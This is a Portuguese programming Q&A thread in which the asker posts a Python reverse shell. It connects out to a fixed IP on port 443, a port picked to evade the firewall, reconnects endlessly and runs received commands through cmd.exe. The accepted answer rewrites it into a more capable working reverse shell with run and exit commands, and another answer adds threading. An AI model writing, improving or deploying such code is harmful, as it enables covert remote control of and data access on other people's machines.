# Como adicionar paralelismo na execução com o módulo subprocess?

Tags: python, thread, multithreading

O código será usado em 2 máquinas virtuais de testes (Linux e Windows).

O código abaixo funciona mas cada vez que executo um programa, por exemplo o `notepad`, o *prompt* fica preso até eu encerrar o programa.

Como fazer para executar vários programas ao mesmo tempo? Imagino que seja com `Threads`, mas ainda não consigo usar o conceito.

Como posso fazer isso?

```
#Apenas a parte Server que ficara em windows . 
#A simple  Reverse Concection in Python 2.  windows
#client netcat:  nc -lvp 443

import socket
import time
import subprocess #Executar comandos do SO

#criando a conexao reversa

IP = '192.168.1.33' # ip do cliente linux netcat que sera a central de comando
PORT = 443 # usamos a porta de https pra confundir o firewall : a conexao de saida nao sera bloqueada

def connect(IP,PORT):
    #conectando a central de controle 
    try:
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)  # IP/TCP

        s.connect((IP,PORT))
        s.send('[!] Conexao recebida\n')        # msg pra ver se foi conectado
        #s.close()
        return s
    except Exception as e:
        print('Erro de conexao',e )
        return None

def listen(s):
##qdo  o cliente nao esta escutando, da erro na conexao e fecha!. Nao quero isso. O server tem que ficar o tempo todo tentando ate conectar!
## versao 3!!!!!!!!!!
#versao 4 usa while True

##########loop infinito para receber comandos
    try:

        while True:
            data = s.recv(1024) # a central de controle envia tb o "Enter" que teclamos apos cada comando {\n}
            #print(data)
            if data[:-1] == '/exit': #tudo exceto o ultimo caractere, que eh o \n
                s.close()#fechar conexao
                exit(0)  # 0 eh execucao normal/sem erros
            else: #executar os comandos
                cmd(s,data)
    except:
        main(s)

def cmd(s,data):
    try:    
        proc = subprocess.Popen(data, shell=True, stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
        saida = s.send(proc.stdout.read() + proc.stderr.read())
        s.send(saida)
        #print(proc.stdout.read())    
    except:
        main(s)

def main(s):
    if s:
        s.close()

    while True:
        s_connected = connect(IP,PORT)
        if s_connected:
            listen(s_connected)
        else:
            print("deu erro na conexao, tentando de novo!!!")##so pra debug
            time.sleep(10)

    #return 0 #nao precisa

s = None
main(s)
```

Comment: O programa funciona? Consegue conectar-se e executar o comando (`cmd()`)?

Comment: Funciona. EU executei  c:\windows\notepad.exe

Comment: @zekk , poderia me dar um exemplo? Nao sei usar threads...

Comment: @zekk, ainda não consegui uma resposta, Você conseguiria ajudar?

Comment: @EdS O código que o Victor postou não funcionou?

Comment: @zekk, infelizmente não funcionou!

Comment: @zekk, obrigado!

Comment: @EdS Se possível delete alguns comentários, para deixar esse "espaço" mais organizado.

Comment: @miguel, consegue me ajudar aqui?

Comment: Olá @EdS. Parece-me que esta pergunta já tem boas respostas em baixo. Em que precisa de ajuda?

Comment: @EdS Teria mais alguma que você quer que inclua na resposta? pois o código que postei funciona como o esperado, pelo menos pra mim aqui. :)

Comment: @stderr, obrigado pela excelente resposta!

Comment: @EdS Disponha. :)

Answer (score 5, accepted):

> O código funciona mas cada vez que executo um programa, por
>   exemplo, c:\windows\notepad.exe, o prompt fica preso até eu encerrar o
>   programa.

Isso acontece devido ao *redirecionamento* que é feito dos [descritores de arquivo](https://pt.wikipedia.org/wiki/Descritor_de_arquivo) do processo criado para o processo pai, que neste caso é o teu *script*.

No código abaixo, a *entrada*, *saída*, e a *saída de erros* são redirecionados para a [*entrada*](https://pt.wikipedia.org/wiki/Fluxos_padr%C3%A3o) do processo pai, esse vínculo interfere na continuação do processo enquanto não terminar o processo criado.

```
subprocess.Popen(data, 
    shell=True, stdin = subprocess.PIPE, stdout= subprocess.PIPE, stderr= subprocess.PIPE)
```

Para evitar isso, não faça nenhum *redirecionamento*, assim nenhum identificador será herdado pelo processo filho.

Você pode fazer isso de duas formas:

1. Use o parâmetro `close_fds`, por padrão (a partir da versão *3.2*) é `False`, mude para `True`.
2. Definir como `None` a *entrada*, *saída*, e a *saída de erros*.

Veja um exemplo:

```
def executarPrograma(cmd):
    try:
        p = subprocess.Popen(cmd, shell=True, close_fds=True)
    except:
        pass
```

**Nota**: A função acima vai tentar executar o que for passado como argumento, sem interferir na execução do *script*. Por exemplo, um executável, *link*, etc.

Para executar um comando no `cmd.exe`, use a função [`subprocess.check_output`](https://docs.python.org/3.5/library/subprocess.html#subprocess.check_output):

```
def executarCMD(s, cmd):
    try:
        saida = subprocess.check_output(['cmd.exe', '/c ', cmd])
        print (saida)
    except:
        pass
```

No teu código, você pode fazer assim:

```
# -*- coding: utf-8 -*-
import socket, subprocess, shlex
from time import sleep

# cliente netcat:  nc -lvp 443

conexao = ('192.168.1.33', 443)
timeout = 10

def conectar(conexao): 
    try:
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.connect(conexao)
        return s
    except:
        return None

def enviarMensagem(s, msg):
    texto = "{}\n".format(msg).encode('utf-8')
    s.send(texto)

def escutar(s):
    try:
        while True:
            # O rstrip() é para eliminar a quebra de linha
            recebido = s.recv(1024).decode('utf-8').rstrip()

            if recebido:
                # Separa as informações recebidas
                informacoes = shlex.split(recebido)

                comando = informacoes[:1] # Pega o primeiro item
                args = informacoes[1:]    # Pega os itens do primeiro em diante

                # Verifica se o comando é "-e" ou "--exit"
                if any(opcao in ['-e', '--exit'] for opcao in comando):
                    print (" + Terminando conexão...")
                    s.close()
                    quit()

                # Verifica se  o comando é para executar um programa
                elif any(opcao in ['-r', '--run'] for opcao in comando):
                    print (" + Executando o programa {}".format(args))
                    executarPrograma(args)

                # Se as opções acima não forem satisfeitas, executa o
                # comando recebido no cmd.exe, ex.: dir, tasklist
                else:
                    print (" + Executando o comando {} no cmd.exe".format(recebido))
                    executarCMD(s, recebido)
    except:
        main(s)

def executarPrograma(cmd):
    try:
        p = subprocess.Popen(cmd, shell=True, close_fds=True)
    except:
        print(" - Não foi possível executar o programa: {}".format(cmd))
        #main(s)

def executarCMD(s, cmd):
    try:
        if len(cmd) >= 3:
            saida = subprocess.check_output(['cmd.exe', '/c ', cmd])

            # Envia a saída ao cliente
            s.send(saida)
    except:
        print(" - Erro ao executar executar comando: {}".format(cmd))

        # Envia a mensagem de erro ao cliente
        enviarMensagem(s, "Erro ao executar comando {}".format(cmd))
        #main(s)

def main(s):
    if s:
        s.close()

    while True:
        conectado = conectar(conexao)
        if conectado:
            enviarMensagem(conectado, "Conexao Estabelecida")
            print (" + Conexao Estabelecida")

            escutar(conectado)
        else:
            print(" - Erro na conexão. Escutando...")
            sleep(timeout)  
    return 0

s = None
main(s)
```

Depois de conectado, para executar um programa basta digitar no terminal do *netcat*: `--run <executavel>` ou `-r <executavel>`, por exemplo: `-r notepad`.

Para executar um comando no `cmd.exe`, só digite o comando, por exemplo: `tasklist`, `dir`, etc. Para encerrar a conexão digite: `--exit` ou `-e`.

Answer (score 5):

Um palpite usando `thread`:

```
import thread

def listen(s):
    try:
        while True:
            data = s.recv(1024) # a central de controle envia tb o "Enter" que teclamos apos cada comando {\n}
            #print(data)
            if data[:-1] == '/exit': #tudo exceto o ultimo caractere, que eh o \n
                s.close()#fechar conexao
                exit(0)  # 0 eh execucao normal/sem erros
            else: #executar os comandos
                try:
                    thread.start_new_thread(cmd, (s,data))
                except:
                    print "Não foi possível criar uma nova thread."
    except:
        main(s)
```

Comment: vou testar o código.